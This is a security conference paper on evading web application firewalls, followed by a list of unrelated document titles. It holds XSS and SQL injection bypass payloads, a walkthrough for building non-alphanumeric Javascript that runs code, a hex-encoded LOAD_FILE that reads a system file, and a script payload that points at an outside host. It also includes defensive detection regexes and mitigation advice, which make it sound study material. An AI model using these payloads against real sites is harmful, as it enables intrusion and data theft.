Bypassing Web Application Firewalls

Pavol Lupták, CEO, Nethemba s.r.o.

Abstract

The goal of the presentation is to describe typical obfuscation attacks that allow an attacker to bypass standard security measures such as the various input filters and output encoding mechanisms used in web-based intrusion detection systems (IDS), intrusion prevention systems (IPS) and web application firewalls (WAFs). These attacks may include different networking tricks, polymorphic shellcode and various code techniques. At the beginning we analyse and compare the different HTML parsing and interpretation approaches used by the most common browsers, which can lead to unique attack vectors. Javascript, with its full range of features, represents another effective way to obfuscate or de-obfuscate code; some existing obfuscation tools are mentioned. We describe how it is possible to construct non-alphanumeric Javascript code, which contains no alphabetic or numeric characters but can still contain malicious executable code. Despite the fact that most current applications are immune to SQL injection attacks, it is still possible to find many vulnerable applications. We focus on different fuzzing techniques (and the useful open-source SQL injection tools that implement them) which can still be used to bypass weak input validation controls. We conclude our presentation with a demonstration of the most basic obfuscation techniques that can be successfully used to bypass traditional web application firewalls (WAFs). Finally, we briefly describe the current mitigation techniques that are recommended for efficient analysis of malicious Javascript code and for sanitizing user input containing untrusted code.

Keywords: WAF, IPS, IDS, obfuscation, SQL injection, XSS, CSS, CSRF.

1 Web Application Firewalls implementations, common problems and vulnerabilities

1.1 What is a Web Application Firewall (WAF)?
According to the OWASP definition [1]: "A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified."

Web Application Firewalls (WAFs) emerged from IDS/IPS systems that were specifically focused on the HTTP protocol and HTTP-related attacks. They usually contain a lot of complex regular expression rules that match most known input/output validation attacks. Commercial ones in particular support extra features like cookie encryption, transparent CSRF protection etc. Except for the free mod_security [2], PHPIDS [3] and AQTRONIX [4], they are quite expensive, and often there is no correlation between their price and their filtering capabilities.

Security and Protection of Information
Choosing the right WAF is not easy, but there are at least two documents that can be helpful in this process: Best Practices: Use of Web Application Firewalls and/or the Web Application Firewall Evaluation Criteria.

1.2 Common WAF implementations

Web Application Firewalls are usually deployed in so-called blacklisting mode, which is much more vulnerable to bypasses and targeted attacks. Blacklisting according to the OWASP definition [5] means "Reject known bad": "This strategy, also known as negative or blacklist validation, is a weak alternative to positive validation. Essentially, if you don't expect to see characters such as %3f or JavaScript or similar, reject strings containing them. This is a dangerous strategy, because the set of possible bad data is potentially infinite. Adopting this strategy means that you will have to maintain the list of known bad characters and patterns forever, and you will by definition have incomplete protection."

A more secure strategy is whitelisting. According to the OWASP definition [6], it means "Accept known good": "This strategy is also known as whitelist or positive validation. The idea is that you should check that the data is one of a set of tightly constrained known good values. Any data that doesn't match should be rejected. Data should be:
- Strongly typed at all times
- Length checked and field lengths minimized
- Range checked if numeric
- Unsigned unless required to be signed
- Syntax or grammar should be checked prior to first use or inspection"

In whitelisting mode the WAF configuration requires knowledge of the application context (i.e. the type of all allowed inputs for all forms), which is quite handy yet difficult to obtain, especially in the case of huge web applications.
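To make the difference between the two OWASP strategies concrete, the following added example (my own code, not from the paper) pits a small "reject known bad" signature list against an "accept known good" per-parameter validator and runs both over four rows of Table 1 from Section 1.3. The signatures, the parameter names id and sort and their value rules are assumptions.

```javascript
// Added example (not from the paper): a toy "reject known bad" filter beside an
// "accept known good" validator, both exercised with rows of Table 1.
// The signatures and the per-parameter rules below are assumptions.

// Negative (blacklist) validation: a few signatures for SQL injection and XSS.
const BLACKLIST = [
  /\bor\s+1\s*=\s*1/i, // "or 1=1" tautology, written with spaces
  /'\s+or\s+'/i,       // quote tautology: ' or '
  /<script>/i,         // a bare <script> tag
  /\balert\s*\(/i      // the canonical XSS probe
];

function blacklistAccepts(value) {
  return !BLACKLIST.some((re) => re.test(value));
}

// Positive (whitelist) validation, one rule per parameter: strongly typed,
// length-limited and range-checked, as the OWASP list in Section 1.2 asks.
// A parameter without a rule is rejected, so new parameters must opt in.
const WHITELIST = {
  id: (v) => /^[1-9][0-9]{0,5}$/.test(v),            // integer 1..999999
  sort: (v) => ["name", "date", "price"].includes(v) // fixed enumeration
};

function whitelistAccepts(param, value) {
  const rule = WHITELIST[param];
  return rule !== undefined && rule(value);
}

// Rows 1, 3, 4 and 7 of Table 1: [blocked attack, undetected modification].
const TABLE1_ROWS = [
  ["' or 1=1--", "' or 2=2--"],
  ["<script>alert(0)</script>", "<script type=vbscript>msgbox(0)</script>"],
  ["' or ''''='r", "'/**/OR/**/''''='"],
  ["1 or 1=1", "(1)or(1)=(1)"]
];

// For each row: does the blacklist stop the original, does it miss the
// modification, and does the whitelist for parameter "id" reject both?
function compare(rows = TABLE1_ROWS) {
  const result = { rows: rows.length, blockedByBlacklist: 0, missedByBlacklist: 0, rejectedByWhitelist: 0 };
  for (const [attack, modified] of rows) {
    if (!blacklistAccepts(attack)) result.blockedByBlacklist++;
    if (blacklistAccepts(modified)) result.missedByBlacklist++;
    if (!whitelistAccepts("id", attack) && !whitelistAccepts("id", modified)) result.rejectedByWhitelist++;
  }
  return result;
}

console.log(compare()); // { rows: 4, blockedByBlacklist: 4, missedByBlacklist: 4, rejectedByWhitelist: 4 }
```

Row 2 of Table 1 (%00alert(0)) is left out because whether a null byte defeats a signature depends on the filter's string handling, which this toy does not model.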
Despite the fact that the blacklisting approach is vulnerable to bypasses and targeted attacks, a web application firewall can still be a cost-effective security solution, especially when a customer has no control over the protected application (the supplier no longer provides application security updates, or the customer has no access to the application's source code). It is necessary to emphasize that a WAF is just a workaround, not a 100% secure replacement for a secure application that correctly validates all user input and output.

1.3 WAF filter rules

WAF filter rules directly reflect WAF effectiveness. Unfortunately, for most WAF vendors they are closely guarded secrets [7] that follow the "security through obscurity" concept [8]: "Security through (or by) obscurity is a pejorative referring to a principle in security engineering, which attempts to use secrecy (of design, implementation, etc.) to provide security. A system relying on security through obscurity may have theoretical or actual security vulnerabilities, but its owners or designers believe that the flaws are not known, and that attackers are unlikely to find them. A system may use security through obscurity as a defense in depth measure; while all known security vulnerabilities would be mitigated through other measures, public disclosure of products and versions in use makes them early targets for newly discovered vulnerabilities in those products and versions. An attacker's first step is usually information gathering; this step is delayed by security through obscurity. The technique stands in contrast with security by design, although many real-world projects include elements of both strategies."
Most determined attackers are able to bypass these rules even without seeing them. Open-source WAFs (mod_security, PHPIDS) have open-source rules, which is beneficial due to the added public scrutiny by skilled penetration testers.

Blocked attack                          | Undetected modification
' or 1=1--                              | ' or 2=2--
alert(0)                                | %00alert(0)
<script>alert(0)</script>               | <script type=vbscript>msgbox(0)</script>
' or ''''='r                            | '/**/OR/**/''''='
<script>alert(0)</script>               | <img src= x:x onerror= alert(0) ></img>
<img src=x:x onerror=alert(0)//></img>  | <img src= onload=alert(0)//></img>
1 or 1=1                                | (1)or(1)=(1)
eval(name)                              | x=this.name X(0?$:name+1)
Table 1: Typical WAF bypasses.

1.4 WAF vulnerabilities

Although a WAF is considered to be a network element that significantly increases the overall security of customer applications, a WAF can also increase the attack surface of the target organization. A WAF may itself be the target of, and vulnerable to, malicious attacks, e.g. XSS, SQL injection, denial-of-service attacks and remote execution vulnerabilities [14]. The increased complexity of any application usually also increases the number of its potential vulnerabilities, and this is also the case for security products, including WAFs.

2 Bypassing Web Application Firewalls

In the following section we describe what a typical bypass flow looks like and how it is possible to write obfuscated Javascript and SQL code, including the practical composition of non-alphanumeric Javascript code.

2.1 Typical bypass flow

A typical bypass flow for the determined attacker can be described in the following 4 steps:

1. Find out which characters or sequences are allowed by the WAF. HTTP response codes are useful for revealing which characters or sequences can be included in the target GET/POST requests.
2. Make an obfuscated version of your injected payload. Making the obfuscated version of the injected payload may require a deep knowledge of the Javascript or SQL language. Be aware that the obfuscated version can be much longer than the original one. If there is no GET/POST parameter size limit, this should not be a problem.

3. Test it and watch the WAF/application response. It is necessary to carefully check which injected characters or sequences are accepted by the application and passed by the web application firewall. Analysing WAF/application responses will reveal which characters or sequences can bypass the given WAF or application validation filter.

4. If it does not bypass, modify your payload and repeat the previous steps.

2.2 Javascript obfuscation

Javascript is a very dynamic, expressive and loosely typed language with powerful features. A Javascript payload is used in XSS attack vectors. For obfuscation, Javascript supports many useful features:
- evals (the possibility to evaluate any expression);
- expression closures (something similar to the typical lambda notation), e.g.:
  (function() alert(1)) ()
  (function($)$(1)) (alert)
- generator expressions, e.g.:
  for ([]in[$=alert])$(2)
  $=[(alert)for([]in[0])][0],$(1)
- iterators (an object that knows how to access items from a collection one at a time, while keeping track of its current position within that sequence), e.g.:
  Iterator([$=alert]).next()[1],$(1)
- special characters and shortcuts.

Javascript also supports various encoding types (Unicode multibyte characters, hexadecimal, octal, or any combination of these) and encryption functions (e.g. XOR, BASE64).

2.3 Non-alphanumeric Javascript code

In the following example we show a situation where the given WAF blocks alphabetic characters and numbers (probably not a realistic situation, but this is a proof of concept). Depending on which characters are blocked and how many, in many cases it is still possible to write fully functional obfuscated code without using these characters.
We consider the situation where only a few special characters like (){}_=[];$!+<> are allowed. Let's summarize the current possibilities of the Javascript language:
- we can use numbers to obtain a single character in a string, e.g. for the string abc, index zero accesses the first character: abc[0];
- we can use addition (+), subtraction (-), multiplication (*), division (/), modulus (%), increment (++) and decrement (--);
- we know that mathematical operators perform automatic numeric conversion;
- we know that string operators perform automatic string conversion.

As a good source of different alphanumeric characters we can use various predefined Javascript objects or error codes, e.g.:

Javascript objects / error states | String result
{}+''                             | [object Object]
+[][+[]]                          | NaN
[][+[]]+''                        | undefined
[![]]+[]                          | false
[!![]]+[]                         | true
Table 2: Source of strings from Javascript objects / error states.

Most of these Javascript objects or error codes can be invoked without using alphanumeric characters. In order to obtain just one character, we need to use a numerical index. If we do not want to use numbers, we need to find an alternative way to represent them without using any alphanumeric characters.

Characters | Result
+[]        | 0
+''        | 0
+""        | 0
-[]        | 0
-''        | 0
-""        | 0
Table 3: The shortest possible methods to create zero without using numbers.

As we can see, the mathematical operators + or - convert an empty string to 0. Now that we have the number zero, we can generate other numbers like 1, 2, 3, etc. using Javascript's automatic conversion behavior:

Possible obfuscation string   | Possible obfuscation string | Result
+[]                           | +[]                         | 0
++[[]][+[]]                   | +!+[]                       | 1
++[++[[]][+[]]][+[]]          | !+[]+!+[]                   | 2
++[++[++[[]][+[]]][+[]]][+[]] | !+[]+!+[]+!+[]              | 3
Table 4: Obfuscated ways to generate numbers.

In a similarly recursive way we can generate any arbitrary number.

2.3.1 Generating the 'alert' string without using any alphanumeric characters

In order to generate the letter 'a', we can use the error message NaN, which means Not a Number: by accessing an empty array ([]) with index 0 we get the value undefined, and converting it to a number we get NaN:
+[][+[]] // result: NaN
When we access this string using index 1 we directly obtain the letter 'a': NaN[1]='a'.
++[[]][+[]] // returns number 1
+[][+[]]+[] // result string: NaN
NaN[1]=(+[][+[]]+[])[++[[]][+[]]] = 'a' // we have character 'a'

Generating the 'l' character is pretty straightforward. 'l' is used e.g. in the boolean false. We use a blank array, apply the NOT (!) operator to obtain a boolean, and wrap it with [] to convert it to a string:
[![]]+[] // string false
++[++[[]][+[]]][+[]] // 2
false[2]=([![]]+[])[++[++[[]][+[]]][+[]]]='l' // we have character 'l'

For generating the 'e' character we can use the boolean true and take the character at index 3:
([!![]]+[]) // string 'true'
++[++[++[[]][+[]]][+[]]][+[]] // 3
true[3] = ([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] // we have character 'e'

The 'r' and 't' characters can be generated in a very similar way from indices 1 and 0 of the 'true' string:
([!![]]+[]) // string 'true'
+[] // 0
++[[]][+[]] // 1
true[1] = ([!![]]+[])[++[[]][+[]]] // we have character 'r'
true[0] = ([!![]]+[])[+[]] // we have character 't'

And finally we have our 'alert' string:
(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]
2.3.2 Executing the code of our choice

In order to execute arbitrary Javascript code we need to gain access to the window object and all of its properties. If we can access this object, we can call the Function constructor to execute arbitrary code. Probably the shortest possible way to gain access to the window object is the following:
alert((1,[].sort)()) // shows our window object!
alert((1,[].reverse)()) // shows our window object! (longer version)

The sort function leaks the window object. This is a real security problem: window objects shouldn't leak! They can break sandboxes and create obfuscation vectors. Thankfully, ECMA5 recognizes this and a future version of Javascript will not leak window in this way [7]. When Javascript loses the reference to the current object that a function was called on, it reverts to the global object (window). The sort and reverse techniques start with a reference to a standard array literal. Then, instead of calling the method on the object, we simply store a reference to the method in another variable. Thus the window is returned when the method is called, as the array literal has been lost [7].

So let's generate alert((1,[].sort)()). We know how to generate the string 'alert', so now we need to generate the 'sort' string.
We can obtain the character 's' from the boolean false:
false[3]=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] // character 's'
In a similar way we can obtain the character 'o' from []+{} (the concatenation of an empty array and an object literal returns the string [object Object], from which we take the first alphabetic character):
([]+{})[++[[]][+[]]] // character 'o'
We have already generated the 'r' and 't' letters, so the final 'sort' is:
([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]

Once we have the window object, we can use our 'alert' string to call the function by accessing the method and passing our string:
(1,[].sort)().alert(1)
After changing the number 1 and the characters 's','o','r','t','a','l','e','r','t' to their obfuscated versions we finally get:
([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]](++[[]][+[]])
which fully works and calls alert(1)!

We have used the static method alert of the window object, but we would like a more universal way to evaluate and execute arbitrary Javascript code. Using the array constructor, we can execute arbitrary code in the following way (accessing the constructor twice from an array object returns Function):
[].constructor.constructor('alert(1)')() // create the function and execute alert(1), or any other Javascript function
To call this function we need to generate the additional 'c', 'n' and 'u' characters (we already have the 'o', 's', 't' and 'r' characters). We can use the output of the [].sort function, function sort() { [native code] }, and apply the above-mentioned methods to gain all the necessary characters.

The website Sla.ckers.org ran the Diminutive Non-Alphanumeric Javascript Contest [9]; its goal was to write the shortest possible non-alphanumeric Javascript code. The winning code, 63 bytes long, from LeverOne:
([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](-~Á)

2.4 SQL obfuscation

SQL obfuscation can help the attacker to bypass web and database application firewalls (e.g. GreenSQL [10]) or an application's input validation controls. Different DBMSs (Database Management Systems) have different SQL syntax (e.g. Oracle SQL does not have the LIMIT clause like MySQL or PostgreSQL), but most of them support Unicode, BASE64, hexadecimal, octal and binary representations, escaping, and hashing algorithms like MD5 or SHA-1. SQL obfuscation strictly depends on the type of DBMS used. Many DBMSs used with PHP still support stacked queries (e.g. PostgreSQL or MSSQL), so in the case of a SQL injection vulnerability the attacker can append his own stacked SQL command. MySQL is not affected; however, if an application uses the PHP Data Objects (PDO) connection library instead of PHP MySQL or MySQLi, MySQL will accept stacked queries. The PDO engine is capable of separating multiple queries and executing them sequentially. In some DBMSs, many blacklisted characters can be replaced by their functionally equivalent alternatives, e.g. the space (0x20) can be replaced by 0xA0 in MySQL.
Comments can also be a good method of obfuscation; sometimes it is really difficult for the web or database application firewall to determine what is a comment and what is not, e.g.:
s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1
Obfuscation examples using hexadecimal and binary representations:
SELECT CONCAT (char (x' ',b' '))
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
SELECT (extractvalue(0x3c613e61646d696e3 C2F613, 0x2F61))
New versions of MySQL and PostgreSQL also support XML functions that can be inadvertently used for obfuscation:
SELECT UpdateXML('<script x=_></script>', '/script/@x','src=//0x.lv');
HTML5 (partially supported by Chrome or Opera) supports local DB storage (SQLite 3.1+) using the openDatabase object, which could possibly (in the future) be misused for persistent XSS or local SQL injection attacks. There are many public SQL injection cheat sheets that describe various obfuscation techniques (e.g. the Ferruh Mavituna cheat sheet [11]).
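Seen from the filter's side, Sections 2.3 and 2.4 call for two things a WAF rule set can do before signature matching: score a parameter for the coercion-primitive density of non-alphanumeric Javascript, and normalise SQL comments and the 0xA0 pseudo-space away. The following is an added example of both (my own code, not from the paper or any WAF product); the thresholds and the tautology signature are assumptions, and the inputs are the payloads quoted above plus two constructed benign strings.

```javascript
// Added example (not from the paper): two defender-side helpers that score or
// normalise a request parameter before signature matching, tried on payloads
// quoted in Sections 2.3 and 2.4. Thresholds and signatures are assumptions.

// --- Section 2.3: non-alphanumeric Javascript -----------------------------
// Code built only from (){}[]+!$_=;<> has almost no letters or digits, but a
// very high density of the coercion primitives from Tables 2-4.
const JS_PRIMITIVES = /\+\[\]|!\[\]|\+\{\}|\[\+\[\]\]/g;

function nonAlnumJsScore(input) {
  const s = input.replace(/\s+/g, "");
  if (s.length === 0) return { length: 0, ratio: 0, primitives: 0, suspicious: false };
  const alnum = (s.match(/[A-Za-z0-9]/g) || []).length;
  const primitives = (s.match(JS_PRIMITIVES) || []).length;
  const ratio = alnum / s.length;
  // Assumed thresholds: at least 20 significant characters, fewer than 10 %
  // ASCII alphanumerics, and at least four coercion primitives.
  const suspicious = s.length >= 20 && ratio < 0.1 && primitives >= 4;
  return { length: s.length, ratio, primitives, suspicious };
}

// --- Section 2.4: comment and whitespace obfuscation in SQL ---------------
// Strip /* ... */ comments and map the 0xA0 byte that MySQL accepts as a
// space to a plain space, so the signature sees roughly what the DBMS parses.
function normalizeSql(input) {
  return input
    .replace(/\/\*[\s\S]*?\*\//g, " ") // each comment becomes one space
    .replace(/[\u00A0\t\r\n]+/g, " ")  // 0xA0 and other whitespace to a space
    .replace(/ {2,}/g, " ")
    .trim()
    .toLowerCase();
}

// The signature uses an ASCII whitespace class on purpose: in many regex
// engines \s does not cover 0xA0, and a comment between tokens is not
// whitespace at all, so the raw signature misses both obfuscations.
const TAUTOLOGY = /\bor[ \t]+1[ \t]*=[ \t]*1\b/i;

function matchesTautology(input, normalise = true) {
  return TAUTOLOGY.test(normalise ? normalizeSql(input) : input);
}

// Sample inputs: the 'alert' string and the contest entry from Section 2.3,
// plus a constructed benign query string and an ordinary Javascript snippet.
const ALERT_NONALNUM = "(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]";
const LEVERONE = "([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](-~Á)";
const BENIGN_QUERY = "page=2&sort=name&q=[draft]";
const ORDINARY_JS = "if (a[0] + b[1] > 2) { x = !y; }";

console.log(nonAlnumJsScore(ALERT_NONALNUM).suspicious, nonAlnumJsScore(LEVERONE).suspicious); // true false
console.log(matchesTautology("1\u00A0or\u00A01=1", false), matchesTautology("1\u00A0or\u00A01=1")); // false true
console.log(matchesTautology("(1)or(1)=(1)")); // false: normalisation alone does not close the blacklist gap
```

The 63-byte contest entry scores only one primitive because its identifiers are non-ASCII letters, so this heuristic misses it; a filter that counts only ASCII alphanumerics needs a Unicode-aware identifier rule as well.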
3 Summary

Despite the fact that Web Application Firewalls are becoming more advanced and sophisticated, it is necessary to understand that they are just workarounds. The ultimate solution is to rely on security in every SDLC phase and to strictly validate all input and output in the application. Using whitelisting is definitely a better idea than using blacklisting (both in the application and in the WAF). In the case of security-critical applications it is recommended to use a 3rd-layer database architecture (where the application has no direct access to the database and has to use special database access functions) and/or database firewalls that work on the database application layer (e.g. GreenSQL [10]). All SQL requests should always be constructed as prepared statements (structured queries) in order to avoid dangerous SQL injection attacks. For HTML validation against XSS attacks, we recommend using external, verified libraries with a good reputation (e.g. HTML Purifier [12] for PHP or OWASP AntiSamy [13] for Java).

References

[1]
[2]
[3]
[4]
[5]
[6]
[7] Mario Heiderich, Eduardo Alberto Vela Nava, Gareth Heyes, David Lindsay: Web Application Obfuscation, 2011
[8]
[9]
[10]
[11]
[12]
[13]
[14]
[15] Existing obfuscation tools
[16] Hackvertor
[17] HackBar
[18] Malzilla
[19] Your imagination
Special thanks

[20] Samy Kamkar for corrections
[21] Mario Heiderich and Stefano Di Paola for personal consultations
More informationThe Past, Present and Future of XSS Defense Jim Manico. HITB 2011 Amsterdam
The Past, Present and Future of XSS Defense Jim Manico HITB 2011 Amsterdam 0 Jim Manico Managing Partner, Infrared Security Web Developer, 15+ Years OWASP Connections Committee Chair OWASP ESAPI Project
More informationProtecting Your Organisation from Targeted Cyber Intrusion
Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology
More informationImplementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
More informationExternal Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
More informationImplementation of Web Application Security Solution using Open Source Gaurav Gupta 1, B. K. Murthy 2, P. N. Barwal 3
Implementation of Web Application Security Solution using Open Source Gaurav Gupta 1, B. K. Murthy 2, P. N. Barwal 3 ABSTRACT 1 Project Engineer, CDACC-56/1, Sector-62, Noida, 2 Executive Director, CDACC-56/1,
More informationStandard: Web Application Development
Information Security Standards Web Application Development Standard IS-WAD Effective Date TBD Email security@sjsu.edu # Version 2.0 Contact Mike Cook Phone 408-924-1705 Standard: Web Application Development
More informationHow To Protect A Web Application From Attack From A Trusted Environment
Standard: Version: Date: Requirement: Author: PCI Data Security Standard (PCI DSS) 1.2 October 2008 6.6 PCI Security Standards Council Information Supplement: Application Reviews and Web Application Firewalls
More informationCracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
More information3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org
More informationPlaying with Web Application Firewalls
Playing with Web Application Firewalls DEFCON 16, August 8-10, 2008, Las Vegas, NV, USA Who is Wendel Guglielmetti Henrique? Penetration Test analyst at SecurityLabs - Intruders Tiger Team Security division
More informationVIDEO intypedia007en LESSON 7: WEB APPLICATION SECURITY - INTRODUCTION TO SQL INJECTION TECHNIQUES. AUTHOR: Chema Alonso
VIDEO intypedia007en LESSON 7: WEB APPLICATION SECURITY - INTRODUCTION TO SQL INJECTION TECHNIQUES AUTHOR: Chema Alonso Informática 64. Microsoft MVP Enterprise Security Hello and welcome to Intypedia.
More informationEVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
More informationEC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.
CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape
More informationWeb Application Security Assessment and Vulnerability Mitigation Tests
White paper BMC Remedy Action Request System 7.6.04 Web Application Security Assessment and Vulnerability Mitigation Tests January 2011 www.bmc.com Contacting BMC Software You can access the BMC Software
More informationInstitutionen för datavetenskap
Institutionen för datavetenskap Department of Computer and Information Science Final thesis Generating web applications containing XSS and CSRF vulnerabilities by Gustav Ahlberg LIU-IDA/LITH-EX-A--14/054--SE
More informationChapter 1 Web Application (In)security 1
Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is
More informationWeb Application Firewall Profiling and Evasion. Michael Ritter Cyber Risk Services Deloitte
Web Application Firewall Profiling and Evasion Michael Ritter Cyber Risk Services Deloitte Content 1. Introduction 2. WAF Basics 3. Identifying a WAF 4. WAF detection tools 5. WAF bypassing methods 6.
More informationApplication Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper
Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks Whitepaper The security industry has extensively focused on protecting against malicious injection attacks like
More informationDFW INTERNATIONAL AIRPORT STANDARD OPERATING PROCEDURE (SOP)
Title: Functional Category: Information Technology Services Issuing Department: Information Technology Services Code Number: xx.xxx.xx Effective Date: xx/xx/2014 1.0 PURPOSE 1.1 To appropriately manage
More informationWeb Intrusion Detection with ModSecurity. Ivan Ristic <ivanr@webkreator.com>
Web Intrusion Detection with ModSecurity Ivan Ristic Aim of This Talk Discuss the state of Web Intrusion Detection Introduce ModSecurity Introduce an open source web application
More informationSQL INJECTION ATTACKS By Zelinski Radu, Technical University of Moldova
SQL INJECTION ATTACKS By Zelinski Radu, Technical University of Moldova Where someone is building a Web application, often he need to use databases to store information, or to manage user accounts. And
More informationKenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data
Kenna Platform Security A technical overview of the comprehensive security measures Kenna uses to protect your data V2.0, JULY 2015 Multiple Layers of Protection Overview Password Salted-Hash Thank you
More informationSANDCAT THE WEB APPLICATION SECURITY ASSESSMENT SUITE WHAT IS SANDCAT? MAIN COMPONENTS. Web Application Security
SANDCAT WHAT IS SANDCAT? THE WEB APPLICATION SECURITY ASSESSMENT SUITE Sandcat is a hybrid multilanguage web application security assessment suite - a software suite that simulates web-based attacks. Sandcat
More informationWeb Application Security
Web Application Security Ng Wee Kai Senior Security Consultant PulseSecure Pte Ltd About PulseSecure IT Security Consulting Company Part of Consortium in IDA (T) 606 Term Tender Cover most of the IT Security
More informationBarracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper
Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper Securing Web Applications As hackers moved from attacking the network to attacking the deployed applications, a category
More informationApplication and Database Security with F5 BIG-IP ASM and IBM InfoSphere Guardium
Application and Database Security with F5 BIG-IP ASM and IBM InfoSphere Guardium Organizations need an end-to-end web application and database security solution to protect data, customers, and their businesses.
More informationAdobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
More informationHow To Fix A Web Application Security Vulnerability
Proposal of Improving Web Application Security in Context of Latest Hacking Trends RADEK VALA, ROMAN JASEK Department of Informatics and Artificial Intelligence Tomas Bata University in Zlin, Faculty of
More information2009-12-26 PST_WEBZINE_0X04. How to solve XSS and mix user's HTML/JavaScript code with your content with just one script
ACS - Active Content Signatures By Eduardo Vela Nava ACS - Active Content Signatures How to solve XSS and mix user's HTML/JavaScript code with your content with just one script Eduardo Vela Nava (sirdarckcat@gmail.com)
More informationWeb Vulnerability Scanner by Using HTTP Method
Available Online at www.ijcsmc.com International Journal of Computer Science and Mobile Computing A Monthly Journal of Computer Science and Information Technology IJCSMC, Vol. 4, Issue. 9, September 2015,
More informationCross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
More informationSecurity Research Advisory IBM inotes 9 Active Content Filtering Bypass
Security Research Advisory IBM inotes 9 Active Content Filtering Bypass Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 7 Active Content Filtering Bypass Advisory
More informationOWASP Top Ten Tools and Tactics
OWASP Top Ten Tools and Tactics Russ McRee Copyright 2012 HolisticInfoSec.org SANSFIRE 2012 10 JULY Welcome Manager, Security Analytics for Microsoft Online Services Security & Compliance Writer (toolsmith),
More informationASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
More informationData Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
More informationPractical Exploitation Using A Malicious Service Set Identifier (SSID)
Practical Exploitation Using A Malicious Service Set Identifier (SSID) Deral Heiland Senior Security Engineer CDW Advanced Technology Services Mike Belton Technical Lead CDW Advanced Technology Services
More informationSecure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
